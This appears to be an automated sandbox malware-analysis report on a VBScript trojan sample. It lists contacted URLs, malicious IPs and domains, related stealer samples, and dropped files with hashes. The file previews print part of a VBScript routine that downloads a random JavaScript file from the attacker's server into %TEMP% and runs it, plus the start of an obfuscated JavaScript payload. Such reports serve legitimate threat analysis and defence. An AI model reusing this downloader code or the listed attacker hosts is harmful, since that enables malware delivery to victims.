                                                        https://apis.google.compowershell.exe, 0000000F.00000002.2374218432.0000024EA5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3B60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA102FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.blogger.com/?tab=wjpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://pko-download.kagyouth.co.ke/js/iethuj.txtkewscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://pko-download.kagyouth.co.ke/js/iethuj.txt72wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs3wscript.exe, 00000000.00000002.2239998782.000001E17E8B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2239498112.000001E17E8B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://play.google.com/?hl=en&tab=w8powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01AB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs5curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 0000000F.00000002.2374218432.0000024EA5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3B60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA102FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://pko-download.kagyouth.co.ke/js/iethuj.txt88.amsi.csv8wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://pko-download.kagyouth.co.ke/list_files.php5wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.google.comxpowershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://go.micropowershell.exe, 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.google.com/?tab=wopowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contoso.com/Iconpowershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://0.googlepowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsFcurl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://mail.google.com/mail/?tab=wmpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.google.com/preferences?hl=enpowershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.youtube.com/?tab=w1powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://0.google.powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://pko-download.kagyouth.co.ke/jswscript.exe, 0000000A.00000003.2262948648.000001E9B13B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267957717.000001E9B13B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262881738.000001E9B13AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://0.google.com/powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.google.com/history/optout?hl=enpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://books.google.com/?hl=en&tab=wppowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/logos/doodles/2024/seasonal-holidays-2powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://translate.google.com/?hl=en&tab=wTpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/logos/doodles/2024/seasonal-holidpowershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aka.ms/pscore68powershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs&curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.google.com/logos/doodles/2024/seasonal-holidXpowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            172.217.19.228
                                                                                                                            www.google.comUnited States
                                                                                                                            15169GOOGLEUSfalse
                                                                                                                            193.149.129.61
                                                                                                                            gsosnub8zg3.topDenmark
                                                                                                                            15411DANISCODKtrue
                                                                                                                            45.11.180.77
                                                                                                                            pko-download.kagyouth.co.keGermany
                                                                                                                            9009M247GBtrue
                                                                                                                            IP
                                                                                                                            127.0.0.1
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1576836
                                                                                                                            Start date and time:2024-12-17 16:31:06 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 6m 6s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:23
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:67618a47ee8c5.vbs
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.expl.evad.winVBS@28/13@3/4
                                                                                                                            EGA Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 92%
                                                                                                                            • Number of executed functions: 12
                                                                                                                            • Number of non-executed functions: 4
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .vbs
                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2144 because it is empty
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7016 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: 67618a47ee8c5.vbs
                                                                                                                            TimeTypeDescription
                                                                                                                            10:32:12API Interceptor88x Sleep call for process: powershell.exe modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            193.149.129.61PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                            • gsosnub8zg3.top/1.php?s=mints21
                                                                                                                            45.11.180.77PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              pko-download.kagyouth.co.kePKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              gsosnub8zg3.topPKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              • 193.149.129.61
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              M247GBPKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.92.33.62
                                                                                                                              JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.84.107.198
                                                                                                                              Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 185.216.35.222
                                                                                                                              236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 38.207.211.244
                                                                                                                              i486.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 194.124.33.29
                                                                                                                              bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 38.202.251.237
                                                                                                                              armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 185.94.188.130
                                                                                                                              https://fsharetv.ioGet hashmaliciousUnknownBrowse
                                                                                                                              • 38.132.109.126
                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                              • 89.185.76.25
                                                                                                                              DANISCODKPKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              • 193.149.129.61
                                                                                                                              https://chhimi.comGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.176.248
                                                                                                                              ufAzjSlbk9.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              a3psA7WqQ5.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              8Rf6zqjxx3.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              aazStC8zop.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              Dgc1F2yZwm.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              QGfY7FF7QH.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              8Rf6zqjxx3.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              rzugG77nwE.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              74954a0c86284d0d6e1c4efefe92b521PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              webhook.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              aLsxeH29P2.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              c9a6BV0eQO.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              37f463bf4616ecd445d4a1937da06e19PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                              • 45.11.180.77
                                                                                                                              No context
                                                                                                                              Process:C:\Windows\System32\curl.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):1928
                                                                                                                              Entropy (8bit):4.449895555983109
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:q58OOD+y8Qyl+hLMpvELdQu8EwNcr1Vmzd/In/IIv:q5FOD+y8QXhLM9KQuJwNcr1VmztInwIv
                                                                                                                              MD5:B25F8E57F50608E9644802482DAD72B1
                                                                                                                              SHA1:9CAE940FDD733ACFD32FF271C461A13D0B8878FF
                                                                                                                              SHA-256:557D6FC2139CA5AD6E0CF5DE5F61659C3247C62D68BE39C653C7E420F13DDD96
                                                                                                                              SHA-512:D1AFDB4D41995870FAE576B781472A41160DBF18CB51E0DEC607CA3D0DEDC86FACA327DFDA8D4ED675548E324640FC7722C458293DEA02A6303A1D96DCBAC19D
                                                                                                                              Malicious:true
                                                                                                                              Preview:Option Explicit..Sub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder). Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath. Set xmlhttp = CreateObject("MSXML2.XMLHTTP"). Set fso = CreateObject("Scripting.FileSystemObject"). Set shell = CreateObject("WScript.Shell").. On Error Resume Next. xmlhttp.Open "GET", baseUrl & listEndpoint, False. xmlhttp.Send.. If Err.Number <> 0 Then. Err.Clear. Exit Sub. End If.. If xmlhttp.Status = 200 Then. jsFiles = Split(Trim(xmlhttp.responseText), vbLf).. If UBound(jsFiles) >= 0 Then.. Randomize. selectedFile = Trim(jsFiles(Int((UBound(jsFiles) + 1) * Rnd))) .. If selectedFile <> "" Then.. tempFolder = shell.ExpandEnvironmentStrings("%TEMP%").. If Not fso.FolderExists(tempFolder) Then. fso.CreateFolder(tempFolder). End If.. jsFilePath = tempFolder & "\" & Replace
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (1690)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):217296
                                                                                                                              Entropy (8bit):4.780424858663202
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:n5S7T815mtM97T815WtMJtM77T815V7T815O:W65zl65jYX65d65O
                                                                                                                              MD5:FCF8FD71DF4EC7AA10B2EE31F14C5C4B
                                                                                                                              SHA1:0D604716D766562AFEEE8FA8839AAC8424C78A15
                                                                                                                              SHA-256:8C3B278A4B2285D5718FD14033148A765B959517DD1F6E1D2B0BA6ED5F5BE0E4
                                                                                                                              SHA-512:DD450A2649AD87B18EC5BE707A7396DD3D2ABC4E003352FB80EC2C5AF65432B53998C7FF969855D071818E8FA4E11778CE62B684E29D0ACD7EFFFB43704AC613
                                                                                                                              Malicious:false
                                                                                                                              Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5511
                                                                                                                              Entropy (8bit):4.266147627591556
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:7ysyAYXEdjm3uKRiTtfKbv3ZEptfBi3SwSGm+p9urbaF/Vxi71y0qPxfOUe7VP8A:7ysFYXE1m3KxfIxLV9uHaBVxeXifw98A
                                                                                                                              MD5:0FD04EAFDBE2B9D4D0BA479ED8337804
                                                                                                                              SHA1:8B8AF00F29C7AF0EC92F2843462873D1001F2FD2
                                                                                                                              SHA-256:309200C4579E7D7945DB1AAA08C65C802A7DE84C0B43B8117DB75D4AAA622930
